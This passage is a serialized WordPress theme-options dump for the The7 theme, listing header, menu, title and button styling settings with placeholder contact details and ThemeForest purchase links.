0px\";s:20:\"general-filter_style\";s:8:\"material\";s:39:\"general-filter_style-material-line_size\";s:3:\"2px\";s:42:\"general-filter_style-minimal-border_radius\";s:5:\"100px\";s:32:\"general-fullscreen_overlay_color\";s:19:\"rgba(255,255,255,1)\";s:37:\"general-fullscreen_overlay_color_mode\";s:5:\"color\";s:35:\"general-fullscreen_overlay_gradient\";s:31:\"135deg|#2edded 30%|#0084bb 100%\";s:34:\"general-fullscreen_overlay_opacity\";s:3:\"100\";s:30:\"general-handheld_icon-old_ipad\";s:55:\"/wp-content/uploads/sites/84/2016/11/the7-old-ipad1.gif\";s:32:\"general-handheld_icon-old_iphone\";s:0:\"\";s:33:\"general-handheld_icon-retina_ipad\";s:54:\"/wp-content/uploads/sites/84/2016/11/the7-ipad-hd1.gif\";s:35:\"general-handheld_icon-retina_iphone\";s:56:\"/wp-content/uploads/sites/84/2016/11/the7-iphone-hd1.gif\";s:27:\"general-images_lazy_loading\";s:1:\"1\";s:14:\"general-layout\";s:4:\"wide\";s:27:\"general-lightbox_arrow_size\";s:4:\"62px\";s:32:\"general-lightbox_overlay_opacity\";s:2:\"85\";s:20:\"general-loader_style\";s:14:\"double_circles\";s:25:\"general-navigation_margin\";s:4:\"40px\";s:25:\"general-next_prev_in_blog\";s:1:\"0\";s:30:\"general-next_prev_in_portfolio\";s:1:\"1\";s:29:\"general-page-title-typography\";a:4:{s:11:\"font_family\";s:6:\"Roboto\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"48\";s:11:\"line_height\";s:2:\"58\";}s:27:\"general-page_content_margin\";s:19:\"70px 20px 70px 20px\";s:34:\"general-page_content_mobile_margin\";s:19:\"70px 20px 70px 20px\";s:29:\"general-portfolio_meta_author\";s:1:\"1\";s:33:\"general-portfolio_meta_categories\";s:1:\"1\";s:31:\"general-portfolio_meta_comments\";s:1:\"1\";s:27:\"general-portfolio_meta_date\";s:1:\"1\";s:25:\"general-portfolio_meta_on\";s:1:\"1\";s:39:\"general-portfolio_thumbnail_proportions\";a:2:{s:5:\"width\";i:3;s:6:\"height\";i:2;}s:32:\"general-portfolio_thumbnail_size\";s:8:\"original\";s:28:\"general-post_back_button_url\";s:0:\"\";s:31:\"general-project_back_button_url\";s:0:\"\";s:28:\"general-rel_posts_head_title\";s:13:\"Related Posts\";s:21:\"general-rel_posts_max\";s:1:\"6\";s:28:\"general-rel_projects_details\";s:1:\"1\";s:28:\"general-rel_projects_excerpt\";s:1:\"1\";s:31:\"general-rel_projects_head_title\";s:16:\"Related projects\";s:32:\"general-rel_projects_info_author\";s:1:\"1\";s:36:\"general-rel_projects_info_categories\";s:1:\"1\";s:34:\"general-rel_projects_info_comments\";s:1:\"1\";s:30:\"general-rel_projects_info_date\";s:1:\"1\";s:25:\"general-rel_projects_link\";s:1:\"1\";s:24:\"general-rel_projects_max\";s:2:\"12\";s:26:\"general-rel_projects_title\";s:1:\"1\";s:25:\"general-rel_projects_zoom\";s:1:\"1\";s:18:\"general-responsive\";s:1:\"1\";s:31:\"general-responsive_title_height\";s:5:\"150px\";s:36:\"general-responsive_title_line_height\";s:2:\"30\";s:29:\"general-responsive_title_size\";s:2:\"20\";s:27:\"general-show_author_in_blog\";s:1:\"1\";s:32:\"general-show_back_button_in_post\";s:1:\"0\";s:35:\"general-show_back_button_in_project\";s:1:\"0\";s:24:\"general-show_breadcrumbs\";s:1:\"1\";s:22:\"general-show_rel_posts\";s:1:\"1\";s:25:\"general-show_rel_projects\";s:1:\"0\";s:19:\"general-show_titles\";s:1:\"1\";s:21:\"general-smooth_scroll\";s:3:\"off\";s:21:\"general-spinner_color\";s:19:\"rgba(196,196,196,1)\";s:31:\"general-switch_content_paddings\";s:5:\"778px\";s:19:\"general-title_align\";s:6:\"center\";s:22:\"general-title_bg_color\";s:19:\"rgba(249,249,250,1)\";s:27:\"general-title_bg_fullscreen\";b:0;s:25:\"general-title_bg_gradient\";s:31:\"135deg|#4a66d6 30%|#12b4ea 100%\";s:22:\"general-title_bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:21:\"general-title_bg_mode\";s:10:\"background\";s:24:\"general-title_bg_overlay\";b:0;s:25:\"general-title_bg_parallax\";s:1:\"0\";s:19:\"general-title_color\";s:7:\"#292e36\";s:24:\"general-title_decoration\";s:4:\"none\";s:35:\"general-title_decoration_line_color\";s:21:\"rgba(173,176,182,0.3)\";s:36:\"general-title_decoration_line_height\";s:3:\"1px\";s:35:\"general-title_decoration_line_style\";s:5:\"solid\";s:38:\"general-title_decoration_outline_color\";s:18:\"rgba(30,115,190,0)\";s:39:\"general-title_decoration_outline_height\";s:3:\"1px\";s:38:\"general-title_decoration_outline_style\";s:5:\"solid\";s:27:\"general-title_enable_bg_img\";s:8:\"disabled\";s:20:\"general-title_height\";s:5:\"200px\";s:27:\"general-title_overlay_color\";s:15:\"rgba(0,0,0,0.5)\";s:36:\"general-title_responsive_breadcrumbs\";b:0;s:27:\"general-title_scroll_effect\";s:7:\"default\";s:36:\"general-titles-responsiveness-switch\";s:5:\"990px\";s:29:\"general-titles_responsiveness\";s:1:\"0\";s:21:\"general-tracking_code\";s:0:\"\";s:17:\"header-background\";s:6:\"normal\";s:15:\"header-bg-color\";s:16:\"rgba(35,38,45,1)\";s:15:\"header-bg-image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:18:\"header-bg-is_fixed\";b:0;s:23:\"header-bg-is_fullscreen\";b:0;s:23:\"header-classic-elements\";a:4:{s:12:\"top_bar_left\";a:1:{i:0;s:11:\"custom_menu\";}s:13:\"top_bar_right\";a:1:{i:0;s:6:\"search\";}s:15:\"near_menu_right\";a:1:{i:0;s:12:\"social_icons\";}s:15:\"near_logo_right\";a:2:{i:0;s:5:\"phone\";i:1;s:5:\"email\";}}s:51:\"header-classic-elements-near_logo-custom-icon-color\";s:0:\"\";s:50:\"header-classic-elements-near_logo-custom-icon-size\";s:2:\"16\";s:44:\"header-classic-elements-near_logo-font_color\";s:7:\"#888888\";s:44:\"header-classic-elements-near_logo-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:46:\"header-classic-elements-near_logo_left-padding\";s:15:\"0px 0px 0px 0px\";s:47:\"header-classic-elements-near_logo_right-padding\";s:15:\"0px 0px 0px 0px\";s:51:\"header-classic-elements-near_menu-custom-icon-color\";s:0:\"\";s:50:\"header-classic-elements-near_menu-custom-icon-size\";s:2:\"16\";s:44:\"header-classic-elements-near_menu-font_color\";s:7:\"#888888\";s:44:\"header-classic-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:47:\"header-classic-elements-near_menu_right-padding\";s:16:\"0px 0px 0px 40px\";s:21:\"header-classic-height\";s:5:\"180px\";s:27:\"header-classic-is_fullwidth\";s:1:\"0\";s:28:\"header-classic-logo-position\";s:4:\"left\";s:28:\"header-classic-menu-bg-color\";s:13:\"rgba(0,0,0,1)\";s:28:\"header-classic-menu-bg-style\";s:5:\"solid\";s:29:\"header-classic-menu-line_size\";s:3:\"1px\";s:26:\"header-classic-menu-margin\";s:7:\"0px 0px\";s:28:\"header-classic-menu-position\";s:4:\"left\";s:28:\"header-classic-show_elements\";s:1:\"1\";s:27:\"header-classic-side-padding\";s:9:\"30px 30px\";s:30:\"header-classic-switch_paddings\";s:3:\"0px\";s:30:\"header-classic_mobile_paddings\";s:7:\"0px 0px\";s:17:\"header-decoration\";s:4:\"line\";s:23:\"header-decoration-color\";s:21:\"rgba(173,176,182,0.3)\";s:27:\"header-decoration-line_size\";s:3:\"1px\";s:27:\"header-elements-button-1-bg\";s:6:\"accent\";s:33:\"header-elements-button-1-bg-color\";s:7:\"#ffffff\";s:36:\"header-elements-button-1-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:37:\"header-elements-button-1-border-color\";s:6:\"accent\";s:42:\"header-elements-button-1-border-color-mono\";s:7:\"#ffffff\";s:38:\"header-elements-button-1-border_radius\";s:3:\"3px\";s:37:\"header-elements-button-1-border_width\";s:3:\"0px\";s:36:\"header-elements-button-1-choose-icon\";s:36:\"icomoon-the7-font-icon-cart-detailed\";s:44:\"header-elements-button-1-first-header-switch\";s:6:\"hidden\";s:33:\"header-elements-button-1-hover-bg\";s:8:\"gradient\";s:39:\"header-elements-button-1-hover-bg-color\";s:7:\"#ffffff\";s:42:\"header-elements-button-1-hover-bg-gradient\";s:31:\"135deg|#119fd3 28%|#24c693 100%\";s:43:\"header-elements-button-1-hover-border-color\";s:6:\"accent\";s:48:\"header-elements-button-1-hover-border-color-mono\";s:7:\"#ffffff\";s:41:\"header-elements-button-1-hover-icon-color\";s:5:\"color\";s:50:\"header-elements-button-1-hover-icon-color-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:46:\"header-elements-button-1-hover-icon-color-mono\";s:7:\"#ffffff\";s:29:\"header-elements-button-1-icon\";s:1:\"1\";s:35:\"header-elements-button-1-icon-color\";s:5:\"color\";s:44:\"header-elements-button-1-icon-color-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:40:\"header-elements-button-1-icon-color-mono\";s:7:\"#ffffff\";s:38:\"header-elements-button-1-icon-position\";s:4:\"left\";s:34:\"header-elements-button-1-icon-size\";s:2:\"16\";s:33:\"header-elements-button-1-icon_gap\";s:4:\"12px\";s:29:\"header-elements-button-1-name\";s:12:\"BUY THE7 NOW\";s:36:\"header-elements-button-1-on-desktops\";s:4:\"show\";s:32:\"header-elements-button-1-padding\";s:19:\"13px 22px 11px 22px\";s:45:\"header-elements-button-1-second-header-switch\";s:6:\"hidden\";s:38:\"header-elements-button-1-smooth-scroll\";b:0;s:31:\"header-elements-button-1-target\";s:1:\"1\";s:35:\"header-elements-button-1-typography\";a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:9:\"font_size\";s:2:\"16\";}s:28:\"header-elements-button-1-url\";s:147:\"https://themeforest.net/item/the7-responsive-multipurpose-wordpress-theme/5556590?ref=Dream-Theme&license=regular&open_purchase_for_item_id=5556590\";s:27:\"header-elements-button-2-bg\";s:6:\"accent\";s:33:\"header-elements-button-2-bg-color\";s:7:\"#ffffff\";s:36:\"header-elements-button-2-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:37:\"header-elements-button-2-border-color\";s:8:\"disabled\";s:42:\"header-elements-button-2-border-color-mono\";s:7:\"#ffffff\";s:38:\"header-elements-button-2-border_radius\";s:3:\"3px\";s:37:\"header-elements-button-2-border_width\";s:3:\"0px\";s:36:\"header-elements-button-2-choose-icon\";s:36:\"icomoon-the7-font-icon-cart-detailed\";s:44:\"header-elements-button-2-first-header-switch\";s:9:\"near_logo\";s:33:\"header-elements-button-2-hover-bg\";s:8:\"gradient\";s:39:\"header-elements-button-2-hover-bg-color\";s:7:\"#ffffff\";s:42:\"header-elements-button-2-hover-bg-gradient\";s:31:\"135deg|#119fd3 30%|#24c693 100%\";s:43:\"header-elements-button-2-hover-border-color\";s:8:\"disabled\";s:48:\"header-elements-button-2-hover-border-color-mono\";s:7:\"#ffffff\";s:41:\"header-elements-button-2-hover-icon-color\";s:5:\"color\";s:50:\"header-elements-button-2-hover-icon-color-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:46:\"header-elements-button-2-hover-icon-color-mono\";s:7:\"#ffffff\";s:29:\"header-elements-button-2-icon\";s:1:\"1\";s:35:\"header-elements-button-2-icon-color\";s:5:\"color\";s:44:\"header-elements-button-2-icon-color-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:40:\"header-elements-button-2-icon-color-mono\";s:7:\"#ffffff\";s:38:\"header-elements-button-2-icon-position\";s:4:\"left\";s:34:\"header-elements-button-2-icon-size\";s:2:\"14\";s:33:\"header-elements-button-2-icon_gap\";s:4:\"10px\";s:29:\"header-elements-button-2-name\";s:12:\"BUY THE7 NOW\";s:36:\"header-elements-button-2-on-desktops\";s:4:\"hide\";s:32:\"header-elements-button-2-padding\";s:17:\"8px 10px 8px 10px\";s:45:\"header-elements-button-2-second-header-switch\";s:9:\"near_logo\";s:38:\"header-elements-button-2-smooth-scroll\";b:0;s:31:\"header-elements-button-2-target\";s:1:\"1\";s:35:\"header-elements-button-2-typography\";a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:9:\"font_size\";s:2:\"12\";}s:28:\"header-elements-button-2-url\";s:147:\"https://themeforest.net/item/the7-responsive-multipurpose-wordpress-theme/5556590?ref=Dream-Theme&license=regular&open_purchase_for_item_id=5556590\";s:39:\"header-elements-contact-address-caption\";s:44:\"8500 Beverly Boulevard Los Angeles, CA 90048\";s:43:\"header-elements-contact-address-custom-icon\";s:25:\"the7-mw-icon-address-bold\";s:51:\"header-elements-contact-address-first-header-switch\";s:9:\"near_logo\";s:36:\"header-elements-contact-address-icon\";s:6:\"custom\";s:43:\"header-elements-contact-address-on-desktops\";s:4:\"show\";s:52:\"header-elements-contact-address-second-header-switch\";s:7:\"in_menu\";s:35:\"header-elements-contact-address-url\";s:0:\"\";s:37:\"header-elements-contact-clock-caption\";s:32:\"Monday – Friday 10 AM – 8 PM\";s:41:\"header-elements-contact-clock-custom-icon\";s:23:\"the7-mw-icon-clock-bold\";s:49:\"header-elements-contact-clock-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-contact-clock-icon\";s:6:\"custom\";s:41:\"header-elements-contact-clock-on-desktops\";s:4:\"show\";s:50:\"header-elements-contact-clock-second-header-switch\";s:7:\"in_menu\";s:33:\"header-elements-contact-clock-url\";s:0:\"\";s:37:\"header-elements-contact-email-caption\";s:18:\"sales@yoursite.com\";s:41:\"header-elements-contact-email-custom-icon\";s:22:\"the7-mw-icon-mail-bold\";s:49:\"header-elements-contact-email-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-contact-email-icon\";s:6:\"custom\";s:41:\"header-elements-contact-email-on-desktops\";s:4:\"show\";s:50:\"header-elements-contact-email-second-header-switch\";s:7:\"in_menu\";s:33:\"header-elements-contact-email-url\";s:0:\"\";s:46:\"header-elements-contact-multipurpose_1-caption\";s:0:\"\";s:50:\"header-elements-contact-multipurpose_1-custom-icon\";s:0:\"\";s:58:\"header-elements-contact-multipurpose_1-first-header-switch\";s:9:\"near_logo\";s:43:\"header-elements-contact-multipurpose_1-icon\";s:6:\"custom\";s:50:\"header-elements-contact-multipurpose_1-on-desktops\";s:4:\"show\";s:59:\"header-elements-contact-multipurpose_1-second-header-switch\";s:7:\"in_menu\";s:42:\"header-elements-contact-multipurpose_1-url\";s:0:\"\";s:46:\"header-elements-contact-multipurpose_2-caption\";s:0:\"\";s:50:\"header-elements-contact-multipurpose_2-custom-icon\";s:0:\"\";s:58:\"header-elements-contact-multipurpose_2-first-header-switch\";s:9:\"near_logo\";s:43:\"header-elements-contact-multipurpose_2-icon\";s:6:\"custom\";s:50:\"header-elements-contact-multipurpose_2-on-desktops\";s:4:\"show\";s:59:\"header-elements-contact-multipurpose_2-second-header-switch\";s:7:\"in_menu\";s:42:\"header-elements-contact-multipurpose_2-url\";s:0:\"\";s:46:\"header-elements-contact-multipurpose_3-caption\";s:0:\"\";s:50:\"header-elements-contact-multipurpose_3-custom-icon\";s:0:\"\";s:58:\"header-elements-contact-multipurpose_3-first-header-switch\";s:9:\"near_logo\";s:43:\"header-elements-contact-multipurpose_3-icon\";s:6:\"custom\";s:50:\"header-elements-contact-multipurpose_3-on-desktops\";s:4:\"show\";s:59:\"header-elements-contact-multipurpose_3-second-header-switch\";s:7:\"in_menu\";s:42:\"header-elements-contact-multipurpose_3-url\";s:0:\"\";s:46:\"header-elements-contact-multipurpose_4-caption\";s:0:\"\";s:50:\"header-elements-contact-multipurpose_4-custom-icon\";s:0:\"\";s:58:\"header-elements-contact-multipurpose_4-first-header-switch\";s:9:\"near_logo\";s:43:\"header-elements-contact-multipurpose_4-icon\";s:6:\"custom\";s:50:\"header-elements-contact-multipurpose_4-on-desktops\";s:4:\"show\";s:59:\"header-elements-contact-multipurpose_4-second-header-switch\";s:7:\"in_menu\";s:42:\"header-elements-contact-multipurpose_4-url\";s:0:\"\";s:37:\"header-elements-contact-phone-caption\";s:13:\"011 322 44 56\";s:41:\"header-elements-contact-phone-custom-icon\";s:23:\"the7-mw-icon-phone-bold\";s:49:\"header-elements-contact-phone-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-contact-phone-icon\";s:6:\"custom\";s:41:\"header-elements-contact-phone-on-desktops\";s:4:\"show\";s:50:\"header-elements-contact-phone-second-header-switch\";s:7:\"in_menu\";s:33:\"header-elements-contact-phone-url\";s:0:\"\";s:37:\"header-elements-contact-skype-caption\";s:10:\"Your_Skype\";s:41:\"header-elements-contact-skype-custom-icon\";s:23:\"the7-mw-icon-skype-bold\";s:49:\"header-elements-contact-skype-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-contact-skype-icon\";s:6:\"custom\";s:41:\"header-elements-contact-skype-on-desktops\";s:4:\"show\";s:50:\"header-elements-contact-skype-second-header-switch\";s:7:\"in_menu\";s:33:\"header-elements-contact-skype-url\";s:0:\"\";s:29:\"header-elements-login-caption\";s:5:\"Login\";s:33:\"header-elements-login-custom-icon\";s:23:\"the7-mw-icon-login-bold\";s:41:\"header-elements-login-first-header-switch\";s:9:\"near_logo\";s:26:\"header-elements-login-icon\";s:6:\"custom\";s:32:\"header-elements-login-logout_url\";s:0:\"\";s:33:\"header-elements-login-on-desktops\";s:4:\"show\";s:42:\"header-elements-login-second-header-switch\";s:7:\"in_menu\";s:25:\"header-elements-login-url\";s:22:\"http://themeforest.net\";s:36:\"header-elements-login-use_logout_url\";b:0;s:30:\"header-elements-logout-caption\";s:6:\"Logout\";s:40:\"header-elements-menu-first-header-switch\";s:9:\"near_logo\";s:25:\"header-elements-menu-icon\";s:6:\"custom\";s:32:\"header-elements-menu-on-desktops\";s:4:\"show\";s:41:\"header-elements-menu-second-header-switch\";s:6:\"hidden\";s:26:\"header-elements-menu-style\";s:8:\"dropdown\";s:39:\"header-elements-menu-style-first-switch\";s:8:\"dropdown\";s:40:\"header-elements-menu-style-second-switch\";s:8:\"dropdown\";s:41:\"header-elements-menu2-first-header-switch\";s:9:\"near_logo\";s:26:\"header-elements-menu2-icon\";s:6:\"custom\";s:33:\"header-elements-menu2-on-desktops\";s:4:\"show\";s:42:\"header-elements-menu2-second-header-switch\";s:7:\"in_menu\";s:27:\"header-elements-menu2-style\";s:8:\"dropdown\";s:40:\"header-elements-menu2-style-first-switch\";s:8:\"dropdown\";s:41:\"header-elements-menu2-style-second-switch\";s:8:\"dropdown\";s:33:\"header-elements-menu2_custom-icon\";s:31:\"the7-mw-icon-dropdown-menu-bold\";s:32:\"header-elements-menu_custom-icon\";s:31:\"the7-mw-icon-dropdown-menu-bold\";s:25:\"header-elements-search-by\";s:7:\"general\";s:30:\"header-elements-search-caption\";s:0:\"\";s:42:\"header-elements-search-first-header-switch\";s:9:\"near_logo\";s:27:\"header-elements-search-icon\";s:6:\"custom\";s:36:\"header-elements-search-input-caption\";s:22:\"Type and hit enter …\";s:34:\"header-elements-search-on-desktops\";s:4:\"show\";s:43:\"header-elements-search-second-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-search_custom-icon\";s:24:\"the7-mw-icon-search-bold\";s:25:\"header-elements-soc_icons\";a:4:{i:0;a:2:{s:4:\"icon\";s:8:\"facebook\";s:3:\"url\";s:0:\"\";}i:1;a:2:{s:4:\"icon\";s:8:\"facebook\";s:3:\"url\";s:1:\"/\";}i:2;a:2:{s:4:\"icon\";s:7:\"twitter\";s:3:\"url\";s:1:\"/\";}i:3;a:2:{s:4:\"icon\";s:8:\"dribbble\";s:3:\"url\";s:1:\"/\";}}s:28:\"header-elements-soc_icons-bg\";s:5:\"color\";s:34:\"header-elements-soc_icons-bg-color\";s:22:\"rgba(173,176,182,0.17)\";s:37:\"header-elements-soc_icons-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:33:\"header-elements-soc_icons-bg-size\";s:4:\"26px\";s:32:\"header-elements-soc_icons-border\";s:8:\"disabled\";s:38:\"header-elements-soc_icons-border-color\";s:7:\"#ffffff\";s:31:\"header-elements-soc_icons-color\";s:7:\"#adb0b6\";s:45:\"header-elements-soc_icons-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-soc_icons-hover-bg\";s:6:\"accent\";s:40:\"header-elements-soc_icons-hover-bg-color\";s:18:\"rgba(21,191,230,1)\";s:43:\"header-elements-soc_icons-hover-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:38:\"header-elements-soc_icons-hover-border\";s:8:\"disabled\";s:44:\"header-elements-soc_icons-hover-border-color\";s:7:\"#ffffff\";s:37:\"header-elements-soc_icons-hover-color\";s:7:\"#ffffff\";s:37:\"header-elements-soc_icons-on-desktops\";s:4:\"show\";s:46:\"header-elements-soc_icons-second-header-switch\";s:7:\"in_menu\";s:30:\"header-elements-soc_icons-size\";s:4:\"16px\";s:39:\"header-elements-soc_icons_border_radius\";s:5:\"100px\";s:38:\"header-elements-soc_icons_border_width\";s:3:\"1px\";s:29:\"header-elements-soc_icons_gap\";i:4;s:20:\"header-elements-text\";s:555:\"[dt_button link=\"https://themeforest.net/item/the7-responsive-multipurpose-wordpress-theme/5556590?ref=Dream-Theme&license=regular&open_purchase_for_item_id=5556590\" target_blank=\"true\" size=\"medium\" style=\"outline_with_bg\" bg_color_style=\"custom\" bg_color=\"#ffffff\" bg_hover_color_style=\"custom\" bg_hover_color=\"#ffffff\" text_color_style=\"custom\" text_color=\"#ffffff\" text_hover_color_style=\"custom\" text_hover_color=\"#292e36\" icon=\"JTNDaSUyMGNsYXNzJTNEJTIyZmElMjBmYS1zaG9wcGluZy1jYXJ0JTIyJTNFJTNDJTJGaSUzRQ==\" icon_align=\"right\"]GET THE7 NOW[/dt_button]\";s:22:\"header-elements-text-2\";s:0:\"\";s:42:\"header-elements-text-2-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-text-2-on-desktops\";s:4:\"hide\";s:43:\"header-elements-text-2-second-header-switch\";s:6:\"hidden\";s:22:\"header-elements-text-3\";s:35:\"Some call to action text goes here!\";s:42:\"header-elements-text-3-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-text-3-on-desktops\";s:4:\"show\";s:43:\"header-elements-text-3-second-header-switch\";s:7:\"in_menu\";s:22:\"header-elements-text-4\";s:0:\"\";s:42:\"header-elements-text-4-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-text-4-on-desktops\";s:4:\"show\";s:43:\"header-elements-text-4-second-header-switch\";s:7:\"in_menu\";s:22:\"header-elements-text-5\";s:0:\"\";s:42:\"header-elements-text-5-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-text-5-on-desktops\";s:4:\"show\";s:43:\"header-elements-text-5-second-header-switch\";s:7:\"in_menu\";s:40:\"header-elements-text-first-header-switch\";s:6:\"hidden\";s:32:\"header-elements-text-on-desktops\";s:4:\"show\";s:41:\"header-elements-text-second-header-switch\";s:6:\"hidden\";s:40:\"header-floating-mobile-first_switch-logo\";s:7:\"desktop\";s:41:\"header-floating-mobile-second_switch-logo\";s:7:\"desktop\";s:33:\"header-floating_microwidgets-font\";s:7:\"default\";s:39:\"header-floating_microwidgets-font-color\";s:7:\"#ffffff\";s:33:\"header-floating_microwidgets-icon\";s:7:\"default\";s:39:\"header-floating_microwidgets-icon-color\";s:7:\"#ffffff\";s:49:\"header-floating_navigation-active_item-font-color\";s:7:\"#ffffff\";s:52:\"header-floating_navigation-active_item-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:35:\"header-floating_navigation-bg-color\";s:16:\"rgba(0,0,0,0.93)\";s:35:\"header-floating_navigation-bg-image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:43:\"header-floating_navigation-bg-is_fullscreen\";b:0;s:37:\"header-floating_navigation-decoration\";s:4:\"line\";s:43:\"header-floating_navigation-decoration-color\";s:22:\"rgba(255,255,255,0.08)\";s:47:\"header-floating_navigation-decoration-line_size\";s:3:\"1px\";s:38:\"header-floating_navigation-font-active\";s:7:\"default\";s:37:\"header-floating_navigation-font-color\";s:7:\"#ffffff\";s:37:\"header-floating_navigation-font-hover\";s:7:\"default\";s:38:\"header-floating_navigation-font-normal\";s:7:\"default\";s:33:\"header-floating_navigation-height\";s:4:\"70px\";s:43:\"header-floating_navigation-hover-font-color\";s:7:\"#ffffff\";s:46:\"header-floating_navigation-hover-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:37:\"header-floating_navigation-show_after\";s:5:\"800px\";s:32:\"header-floating_navigation-style\";s:4:\"fade\";s:34:\"header-floating_navigation-top-bar\";b:0;s:22:\"header-inline-elements\";a:1:{s:15:\"near_menu_right\";a:2:{i:0;s:6:\"button\";i:1;s:8:\"button-2\";}}s:50:\"header-inline-elements-near_menu-custom-icon-color\";s:0:\"\";s:49:\"header-inline-elements-near_menu-custom-icon-size\";s:2:\"16\";s:43:\"header-inline-elements-near_menu-font_color\";s:7:\"#3b3f4a\";s:43:\"header-inline-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:500\";s:9:\"font_size\";s:2:\"13\";}s:46:\"header-inline-elements-near_menu_right-padding\";s:16:\"0px 30px 0px 0px\";s:20:\"header-inline-height\";s:5:\"120px\";s:26:\"header-inline-is_fullwidth\";s:1:\"1\";s:27:\"header-inline-menu-position\";s:4:\"left\";s:27:\"header-inline-show_elements\";s:1:\"1\";s:26:\"header-inline-side-padding\";s:7:\"0px 0px\";s:29:\"header-inline-switch_paddings\";s:3:\"0px\";s:29:\"header-inline_mobile_paddings\";s:7:\"0px 0px\";s:13:\"header-layout\";s:6:\"inline\";s:19:\"header-logo-padding\";s:16:\"0px 0px 0px 30px\";s:14:\"header-logo_hd\";a:2:{i:0;s:40:\"/wp-content/uploads/2017/03/l-001-hd.png\";i:1;i:1234;}s:19:\"header-logo_regular\";a:2:{i:0;s:37:\"/wp-content/uploads/2017/03/l-001.png\";i:1;i:1235;}s:32:\"header-mega-menu-desc-font-color\";s:7:\"#3b3f4a\";s:32:\"header-mega-menu-desc-typography\";a:2:{s:11:\"font_family\";s:9:\"Open Sans\";s:9:\"font_size\";s:2:\"13\";}s:30:\"header-mega-menu-items-padding\";s:16:\"0px 0px 10px 0px\";s:40:\"header-mega-menu-submenu-2-level-spacing\";s:3:\"0px\";s:35:\"header-mega-menu-submenu-bg-padding\";s:17:\"0px 10px 0px 10px\";s:39:\"header-mega-menu-submenu-column-padding\";s:19:\"20px 10px 20px 10px\";s:37:\"header-mega-menu-submenu-column-width\";s:5:\"240px\";s:45:\"header-mega-menu-title-active_item-font-color\";s:7:\"#ffffff\";s:51:\"header-mega-menu-title-active_item-font-color-style\";s:6:\"accent\";s:48:\"header-mega-menu-title-active_item-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:33:\"header-mega-menu-title-font-color\";s:7:\"#3b3f4a\";s:39:\"header-mega-menu-title-hover-font-color\";s:7:\"#ffffff\";s:45:\"header-mega-menu-title-hover-font-color-style\";s:6:\"accent\";s:42:\"header-mega-menu-title-hover-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:32:\"header-mega-menu-title-icon-size\";s:2:\"18\";s:33:\"header-mega-menu-title-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"18\";}s:36:\"header-mega-menu-widget-accent-color\";s:0:\"\";s:34:\"header-mega-menu-widget-font-color\";s:7:\"#3b3f4a\";s:35:\"header-mega-menu-widget-title-color\";s:7:\"#3b3f4a\";s:34:\"header-menu-active_item-font-color\";s:7:\"#ffffff\";s:40:\"header-menu-active_item-font-color-style\";s:5:\"color\";s:37:\"header-menu-active_item-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:30:\"header-menu-close_icon-caption\";s:8:\"disabled\";s:35:\"header-menu-close_icon-caption-text\";s:10:\"Navigation\";s:41:\"header-menu-close_icon-caption-typography\";a:3:{s:11:\"font_family\";s:6:\"Roboto\";s:14:\"text_transform\";s:9:\"uppercase\";s:9:\"font_size\";s:2:\"16\";}s:34:\"header-menu-close_icon-caption_gap\";s:4:\"20px\";s:31:\"header-menu-close_icon-position\";s:7:\"outside\";s:27:\"header-menu-close_icon-size\";s:11:\"fade_medium\";s:41:\"header-menu-decoration-other-active-color\";s:22:\"rgba(255,255,255,0.15)\";s:47:\"header-menu-decoration-other-active-color-style\";s:6:\"accent\";s:44:\"header-menu-decoration-other-active-gradient\";s:55:\"135deg|rgba(255,255,255,0.15) 30%|rgba(0,0,0,0.15) 100%\";s:40:\"header-menu-decoration-other-active-line\";s:1:\"0\";s:46:\"header-menu-decoration-other-active-line-color\";s:20:\"rgba(130,36,227,0.3)\";s:52:\"header-menu-decoration-other-active-line-color-style\";s:5:\"color\";s:49:\"header-menu-decoration-other-active-line-gradient\";s:56:\"135deg|rgba(221,51,51,0.3) 30%|rgba(129,215,66,0.3) 